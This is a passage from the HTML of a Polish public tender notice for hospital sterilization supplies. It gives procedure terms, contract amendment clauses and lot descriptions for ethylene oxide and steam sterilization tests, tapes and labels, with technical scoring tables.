upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.W przypadku złożenia oferty zawierającej zastosowanie rozwiązań równoważnych do opisywanych przez Zamawiającego, obowiązek udowodnienia ich równoważności z wymaganiami wskazanymi przez Zamawiającego, leży po stronie Wykonawcy. Wykonawca musi w takim przypadku załączyć zestawienie materiałów równoważnych wraz z innymi niezbędnymi dokumentami potwierdzającymi spełnienie w/w wymagań np. kart katalogowych, deklaracje zgodności, aprobaty techniczne itp.Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp, składane w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow">0</span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow">0</span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Strony obowiązuje zakaz dokonywania zmian umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, za wyjątkiem zmian przewidzianych w niniejszej umowie- stanowiącej załącznik do SIWZ lub dopuszczalnych w obowiązujących przepisach prawa w tym w art. 144 Ustawy, który definiuje również znamię istotności zmian umowy.1a. Zamawiający dopuszcza możliwość zmiany umowy jeżeli będą one korzystne dla Zamawiającego.1b. Zamawiający dopuszcza możliwość zmiany umowy w sytuacji gdy nastąpi zmiana przepisów prawa, w zakresie mającym wpływ na realizację umowy.2. Zamawiający dopuszcza dokonanie zmian w umowie w przypadku zajścia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy, gdy istnieje obiektywna konieczność wprowadzenia tych zmian, a spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu k.c.2a. Strony dopuszczają zmianę cen poszczególnych przedmiotów umowy w wypadku jej obniżenia przez Wykonawcę (w takim samym zakresie dopuszcza się zmianę wynagrodzenia Wykonawcy).3. Strony zgodnie ustalają, iż w razie zmiany stawki podatku VAT, nastąpi zmiana wynagrodzenia uwzględniająca zmianę stawki podatku, w ten sposób, że do ceny netto określonej w niniejszej umowie zostanie doliczona nowa stawka podatku. W przypadku zmiany stawki podatku VAT w trakcie wykonywania umowy, zmianą zostanie objęta wyłącznie część umowy wykonywana po wejściu w życie nowej stawki podatku. Powyższa zmiana następuje z mocy prawa, od dnia wejścia w życie nowej stawki podatku VAT, a zostanie potwierdzona poprzez wystawianie i akceptacje kolejnych faktur. 4. Strony dopuszczają możliwość zmiany przedmiotu umowy w ten sposób, że Zamawiający zrezygnuje z zamówienia części towarów z przyczyn obiektywnych, w tym w razie braku konieczności stosowania części przedmiotów umowy. W takim przypadku wynagrodzenie Wykonawcy ulegnie stosunkowemu pomniejszeniu i nie będą Wykonawcy przysługiwać z powyższego tytułu żadne roszczenia, w tym odszkodowawcze.5. Strony przewidują możliwość zmiany przedmiotu umowy określonego w SIWZ oraz ofercie Wykonawcy w przypadku braku określonego towaru na rynku lub w razie wydania decyzji w sprawie zakazania, wstrzymania lub ograniczenia wprowadzenia towaru do obrotu. W takiej sytuacji dotyczącej produktów będących przedmiotem umowy, Wykonawca jest zobowiązany natychmiast przy złożeniu na nie zamówienia przez Zamawiającego do zaoferowania zamienników tych produktów w cenie nie przekraczającej ceny towarów, których brak na rynku lub którego dotyczą ww. decyzje. W razie akceptacji Zamawiającego, Wykonawca jest obowiązany dostarczyć ww. zamienniki w terminie wynikającym z paragrafu 2 ust. 4 umowy tj. …. dni /max 5 - kryterium oceniane-/ od daty ich zaakceptowania (także telefonicznego) przez Zamawiającego. W wypadku gdy Wykonawca przy składaniu Zamówienia poinformuje, iż nie jest w stanie dostarczyć przedmiotu umowy lub zamiennika w terminie wskazanym powyżej lub nie dostarczy przedmiotu umowy lub zamiennika w tym terminie, Zamawiający może dokonać zamówionego towaru u innego kontrahenta, wówczas § 5 ust. 7- 11stosuje się odpowiednio.6. Strony dokonają zmiany wynagrodzenie Wykonawcy również w wypadku:- zmian wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę lub zasad podlegania ubezpiecze-niom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia spo-łeczne lub zdrowotne pod warunkiem wykazania przez Wykonawcę, że zmiany te będą miały wpływ na koszty wykonania zamówienia.6A. Zmiany o których mowa w ust. 6 mogą zostać dokonane mocą pisemnego aneksu do umowy po wcze-śniejszym uzgodnieniu przez strony jego treści. Z inicjatywą zmiany umowy w ww. zakresie Wykonawca występuje na piśmie zawierającym szczegółowe uzasadnienie poprzedzone odpowiednimi analizami i szczegółowymi wyliczeniami m.in. kalkulacji kosztów pracy szacowanych przy sporządzaniu oferty oraz kosztów pracy po wprowadzeniu zmian wynikających ze zmian przepisów wskazanych w ust. 6 mających wpływ na koszty wykonywania zamówienia Zamawiającego przez osoby wykonujące pracę na rzecz Wy-konawcy wraz z przedłożeniem dowodów na poparcie powoływanych okoliczności.7. Zmiana umowy nastąpi w formie pisemnego aneksu pod rygorem nieważności (nie dotyczy to zmiany opisanej w ust. 3.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-03-16</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">pl</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Pakiet 1 - Asortyment do sterylizacji niskotemperaturowej </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PAKIET 1 - Asortyment do sterylizacji niskotemperaturowejLp.	Opis przedmiotu zamówienia	Przewidywane zużycie1	Papier do drukarki sterylizatora gazowego 4XL (3 1/8 in.x 100ft x 79 mm x 30m)nr seryjny 70-2006-7846-7	2 szt.2	Test biologiczny do sterylizacji w 100% tlenku etylenu 600 szt.3	Zintegrowany test sterylizacji w 100% tlenku etylenu z polem wskaźnikowym	5 op. x 100 szt.4	Taśma samoprzylepna ze wskaźnikiem sterylizacji w tlenku etylenu 19 mm x 50 m.	5 rolek5	Etykiety do metkownicy trzyrzędowej typu BLITZ, dwukrotnie przylepne ze wskaźnikiem sterylizacji w tlenku etylenu, zawierające opisane pola umożliwiające wprowadzenie danych: daty sterylizacji, daty ważności, nr sterylizatora, nr cyklu, nr operatora.	50 rolek x 500 szt.TABELA OCENY WARUNKÓW TECHNICZNYCH W PAKIECIE 1Lp.	Dotyczy pozycji nr	Oceniana cecha	Punktacja	Szczegółowy opis kryteriów oceny1.	2.	A -Postać dostarczonego testu	0-15	Dowolna postać testu	O pkt Test w formie ampułki	15 pkt2.	2.	B -Warunki przechowywania testu przed użyciem	0-10	Test wymaga przechowywania w warunkach chłodniczych	O pkt Test przechowuje się w temperaturze pokojowej	10 pkt3.	3.	C -Ilość pół wskaźnikowych na teście	0-10	? 2 pól wskaźnikowych	O pkt 1 pole wskaźnikowe	10 pkt PAKIET 1 - Asortyment do sterylizacji niskotemperaturowejLp.	Opis przedmiotu zamówienia	Przewidywane zużycie1	Papier do drukarki sterylizatora gazowego 4XL (3 1/8 in.x 100ft x 79 mm x 30m)nr seryjny 70-2006-7846-7	2 szt.2	Test biologiczny do sterylizacji w 100% tlenku etylenu 600 szt.3	Zintegrowany test sterylizacji w 100% tlenku etylenu z polem wskaźnikowym	5 op. x 100 szt.4	Taśma samoprzylepna ze wskaźnikiem sterylizacji w tlenku etylenu 19 mm x 50 m.	5 rolek5	Etykiety do metkownicy trzyrzędowej typu BLITZ, dwukrotnie przylepne ze wskaźnikiem sterylizacji w tlenku etylenu, zawierające opisane pola umożliwiające wprowadzenie danych: daty sterylizacji, daty ważności, nr sterylizatora, nr cyklu, nr operatora.	50 rolek x 500 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33100000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Parametry techniczne</td><td style="border: 1px solid black;border-collapse: collapse;">35,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>TABELA OCENY WARUNKÓW TECHNICZNYCH W PAKIECIE 1Lp.	Dotyczy pozycji nr	Oceniana cecha	Punktacja	Szczegółowy opis kryteriów oceny1.	2.	A -Postać dostarczonego testu	0-15	Dowolna postać testu	O pkt<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Pakiet 2 - Asortyment do sterylizacji parowej</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PAKIET 2 - Asortyment do sterylizacji parowejLp.	Opis przedmiotu zamówienia	Przewidywane zużycie1	Ampułkowy test biologiczny do kontroli sterylizacji para wodną; odczyt po 24 godz.; populacja 10 6;	10 op. x 100 szt.2	Taśma samoprzylepna ze wskaźnikiem sterylizacji parowej 19 mm x 55 mb	20 rolek3	Taśma samoprzylepna super mocna bez indykatora 19 mm x 50 mb.	20 rolek4	Odwijarka do taśmy sterylizacyjnej umożliwiająca zastosowanie 1 szt taśmy sterylizacyjnej w wymiarze 19 mm x 55 mb	2 szt5	Przyrząd PCD do kontroli sterylizacji pary wodnej testami chemicznymi V lub VI klasy i biologicznymi w jednym czasie oraz testami Bowie & Dick, z wbudowaną wężownicą o dł. 1,5 m i średnicy 1 mm.	2 szt6	Test paskowy Bowie & Dick z przesuwną substancją wskaźnikową kompatybilny z przyrządem PCD przeznaczonym również do testów chemicznych V lub VI klasy oraz testów biologicznych.	1 200 szt7	Integrator chemiczny do sterylizacji parowej klasa 5, wskaźnik może być stosowany we wszystkich procesach sterylizacji parowej (grawitacja, próżnia) z ruchomą substancją wskaźnikową, oznaczenie normy, klasy i daty przydatności do użycia na każdym wskaźniku, test z wyraźnie oznaczonym polem bezpieczeństwa odczytu poprawności testu w postaci jednego okienka.	1 op. x 100 szt.8	Test chemiczny klasy 6 emulacyjny stosowany do oceny parametrów krytycznych procesu sterylizacji nasyconą parą wodną w sterylizatorach parowych wszystkich typów. Parametry 134oC/7 min - 121oC/20 min. Oznaczenie daty przydatności do użycia na każdym wskaźniku. Wynik testu jest natychmiastowy i łatwy w interpretacji- prawidłowy przebieg procesu sterylizacji sygnalizowany wyraźną zmianą koloru emulatora - test zawiera pole porównawcze z określonym kolorem wskaźnika po sterylizacji.	30 op. x 200 szt.9	Test chemiczny klasy 6 emulacyjny stosowany do oceny parametrów krytycznych procesu sterylizacji nasyconą parą wodną w sterylizatorach parowych wszystkich typów. Parametry 134oC/5,5 min. Oznaczenie daty przydatności do użycia na każdym wskaźniku Wynik testu jest natychmiastowy i łatwy w interpretacji - prawidłowy przebieg procesu sterylizacji sygnalizowany wyraźną zmianą koloru emulatora - test zawiera pole porównawcze z określonym kolorem wskaźnika po sterylizacji.	30 op. x 200 szt.10	Metkownica trzyrzędowa do oznaczania pakietów typu Blitz	1 szt.11	Etykiety do metkownicy trzyrzędowej typu BLITZ, dwukrotnie przylepne ze wskaźnikiem sterylizacji parowej (kod producenta - 3789), zawierające opisane pola umożliwiające wprowadzenie danych: daty sterylizacji, daty ważności,nr sterylizatora, nr cyklu, nr operatora.	200 rolek x 500 szt.12	Rolka tuszująca do metkownicy trzyrzędowej typu BLITZ , dł. 4 cm., szerokość 2,5 cm.	5 szt.13	Test kontroli zgrzewu do zgrzewarki typu Hawo (posiadanej przez Zamawiającego)	2 000 szt.14	Rolka tuszująca do zgrzewarki typu Hawo - FARBBAND NYLON SCHWARZ 13 MM; HM 750-3020; 6.813.104 - wymagana oryginalna	50 szt.15	Kaseta do drukarki typu CBM-920 do sterylizatora parowego typu AS 666WPA	50 szt.TABELA OCENY WARUNKÓW TECHNICZNYCH W PAKIECIE 2Lp.	Dotyczy pozycji nr	Oceniana cecha	Punktacja	Szczegółowy opis kryteriów oceny1.	1.	A -Warunki przechowywania testu przed użyciem	0 -10	Test wymaga przechowywania w warunkach chłodniczych	0 pkt Test przechowuje się w temperaturze pokojowej	10 pkt2.	4.	B -Ilość taśm sterylizacyjnych możliwych do zastosowania w odwijarce	0-15	>, = 2 taśmy sterylizacyjne	0 pkt 1 taśma sterylizacyjna	15 pkt3.	8. i 9	C -Zawartość w teście ołowiu i metali ciężkich	0-10	Min zawartość ołowiu i metali ciężkich	0 pkt Brak zawartości ołowiu i metali ciężkich	10 pkt PAKIET 2 - Asortyment do sterylizacji parowejLp.	Opis przedmiotu zamówienia	Przewidywane zużycie1	Ampułkowy test biologiczny do kontroli sterylizacji para wodną; odczyt po 24 godz.; populacja 10 6;	10 op. x 100 szt.2	Taśma samoprzylepna ze wskaźnikiem sterylizacji parowej 19 mm x 55 mb	20 rolek3	Taśma samoprzylepna super mocna bez indykatora 19 mm x 50 mb.	20 rolek4	Odwijarka do taśmy sterylizacyjnej umożliwiająca zastosowanie 1 szt taśmy sterylizacyjnej w wymiarze 19 mm x 55 mb	2 szt5	Przyrząd PCD do kontroli sterylizacji pary wodnej testami chemicznymi V lub VI klasy i biologicznymi w jednym czasie oraz testami Bowie & Dick, z wbudowaną wężownicą o dł. 1,5 m i średnicy 1 mm.	2 szt6	Test paskowy Bowie & Dick z przesuwną substancją wskaźnikową kompatybilny z przyrządem PCD przeznaczonym również do testów chemicznych V lub VI klasy oraz testów biologicznych.	1 200 szt7	Integrator chemiczny do sterylizacji parowej klasa 5, wskaźnik może być stosowany we wszystkich procesach sterylizacji parowej (grawitacja, próżnia) z ruchomą substancją wskaźnikową, oznaczenie normy, klasy i daty przydatności do użycia na każdym wskaźniku, test z wyraźnie oznaczonym polem bezpieczeństwa odczytu poprawności testu w postaci jednego okienka.	1 op. x 100 szt.8	Test chemiczny klasy 6 emulacyjny stosowany do oceny parametrów krytycznych procesu sterylizacji nasyconą parą wodną w sterylizatorach 